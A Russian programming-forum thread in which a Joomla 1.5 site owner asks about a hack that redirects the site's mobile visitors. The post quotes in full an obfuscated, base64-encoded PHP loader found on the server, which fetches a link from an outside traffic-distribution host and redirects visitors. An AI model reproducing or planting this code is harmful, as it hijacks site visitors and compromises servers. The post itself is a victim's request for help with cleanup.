Форум программистов, компьютерный форум, киберфорум
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
Другие темы раздела
Безопасность сайтов Вирус, или обнаглела реклама? https://www.cyberforum.ru/ web-security/ thread965544.html
У меня такая ситуация. Захожу на свой сайт. загружается главная страничка и сразу же поверх ее во весь экран, появляется полупрозрачное окно. В левом верхнем углу надпись ADS BY BINLAYER. В центре...
Спамят на сайте Безопасность сайтов
В общем недавно начали добавлять комменты с корявым английским и всё это от разных айпишников. Началось сегодня утром в 8:00 и до сих пор продолжается. В общем понятно, что "злоумышленник" меняет...
Упал сайт. 502/504 Безопасность сайтов
Добрый день. Сегодня возникла такая проблема, сайт перестал грузиться. Выдавал то 502, то 504 ошибку. В логах нашёл такую строку Timeout waiting for output from CGI script...
Безопасность сайтов Переадресация Как сделать так что бы набирая в поисковой строке xxx.ru (пример) он переходил на yyy.ru https://www.cyberforum.ru/ web-security/ thread952578.html
Безопасность сайтов Реально ли наказать хулигана? https://www.cyberforum.ru/ web-security/ thread950068.html
Играю в одну сетевую игру, вернее включаю сервер для игры. И вот на днях один недокрекер в открытую угрожал устроить DDOS атаку. Честно говоря, сразу это видимых проблем это не принесло, но через...
Безопасность сайтов Запрет на обращение к исходному коду страницы
Такой вопрос - есть ли у администрации сайта (любого) возможность отследить случаи, когда какой-либо пользователь очень часто удаленно считывает исходный код страниц на этом сайте и как-то...
Безопасность сайтов Взломали сайт
Всем привет, у меня недавно был взломан сайт. Захожу на свой сайт и вижу там: Hacked by Nu11ers3t. Сайт: padragon.ru Стоит на VDS.
Безопасность сайтов Насколько безопасно хранить CMS в папке public_html ? Добрый день! Есть некоторые вопросы. Попытаюсь написать коротко. Пишу свою CMS. С ноля. Насколько безопасно хранить файлы движка (абсолютно все) в папке public_html ? Неоднократно видел, что так... https://www.cyberforum.ru/ web-security/ thread940783.html
Безопасность сайтов Ошибки с подключением к серверу и выводом сайта https://www.cyberforum.ru/ web-security/ thread934747.html
Всем привет! Кто знает, помогите советом. Попытался зайти через ТК на фтп своего сайта, логин, пароль, учетную запись и сервер вставил, выдает мне ошибку, потом захожу на сайт, а мне пишет:...
Безопасность сайтов Не принесут ли вреда зараженные файлы с сайта компьютеру? мой сайт взломали,и чтобы удалить вирус с ftp-файлов.Посоветовали через winscp перекачать на копм,удалить вирус и снова на сервер.скажите вреда моему компу такие файлу не принесут?Очень надо! https://www.cyberforum.ru/ web-security/ thread932562.html
96 / 96 / 21
Регистрация: 25.04.2012
Сообщений: 441
15.10.2013, 14:14  [ТС] 0

взломали сайт (только мобильную версию)

15.10.2013, 14:14. Показов 1082. Ответов 7
Метки (Все метки)

Ответ

Цитата Сообщение от Taatshi Посмотреть сообщение
Tiva, на чем сайт сделан? Начните с .htaccess и с индексного файла. Где-то стоит редирект для мобильников.
сайт на джумле 1.5
почитал, понял что это стоит редирект, зашифрован в base64 и раскидан по многим файлам

удалил парочку зараженных
eval(base64decode("...
и далее длинная шифрованная строка, в которой прописан редирект с поисковиков и тд

на том же форуме, где прочитал это, написано, что файлы вот с таким содержанием, так же - вирусы
надо ли удалять такие файлы? их намного больше чем с eval
PHP
1
<? $GLOBALS['_1721311675_']=Array(base64_decode('' .'c2V0X3R' .'pb' .'W' .'V' .'fbGltaXQ='),base64_decode('ZGlybmF' .'tZQ=='),base64_decode('ZmlsZV9nZXRf' .'Y29' .'u' .'dGVudHM='),base64_decode('' .'c3R' .'ybGVu'),base64_decode('' .'dGltZQ' .'=='),base64_decode('ZmlsZW' .'1' .'0aW1l'),base64_decode('YmFzZ' .'TY0X' .'2R' .'lY29kZQ=='),base64_decode('Zml' .'sZ' .'V9' .'nZXRfY29u' .'dGVudHM' .'='),base64_decode('' .'c' .'3Ry' .'b' .'GVu'),base64_decode('Zm9wZW4='),base64_decode('ZnB' .'1' .'dH' .'M='),base64_decode('' .'ZmNsb' .'3' .'Nl'),base64_decode('aGVh' .'ZGVy')); ?><? function _447979436($i){$a=Array('L2xpbmsuY2FjaGU=','aHR0cDovL2h0LXRkczcuaW4vbGluay5waHA/cXFxPTQ4NzU3OA==','dw==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1721311675_'][0](round(0+6+6+6+6+6));$_0=$GLOBALS['_1721311675_'][1](__FILE__) ._447979436(0);$_1=@$GLOBALS['_1721311675_'][2]($_0);if($GLOBALS['_1721311675_'][3]($_1)<round(0+20)||($GLOBALS['_1721311675_'][4]()-@$GLOBALS['_1721311675_'][5]($_0))>round(0+15+15+15+15)){$_1=$GLOBALS['_1721311675_'][6](@$GLOBALS['_1721311675_'][7](_447979436(1)));if($GLOBALS['_1721311675_'][8]($_1)>round(0+20)){$_2=@$GLOBALS['_1721311675_'][9]($_0,_447979436(2));@$GLOBALS['_1721311675_'][10]($_2,$_1);@$GLOBALS['_1721311675_'][11]($_2);}}$GLOBALS['_1721311675_'][12](_447979436(3) .$_1);exit; ?>


Вернуться к обсуждению:
взломали сайт (только мобильную версию)
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
15.10.2013, 14:14
Готовые ответы и решения:

Взломали сайт
Всем привет. Сегодня утром при переходе на сайт обнаружил следующую картину: изображение медвежонка...

Взломали сайт
Всем привет, у меня недавно был взломан сайт. Захожу на свой сайт и вижу там: Hacked by...

Взломали сайт на joomla
Взломали сайт помогите восстановить сайт http://cto-avto.com/

Взломали сайт. Как найти вредоносное содержимое?
Я - не программист. Сайты делала сама методом научного тыка. Мне приостановили хостинг, так как...

7
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.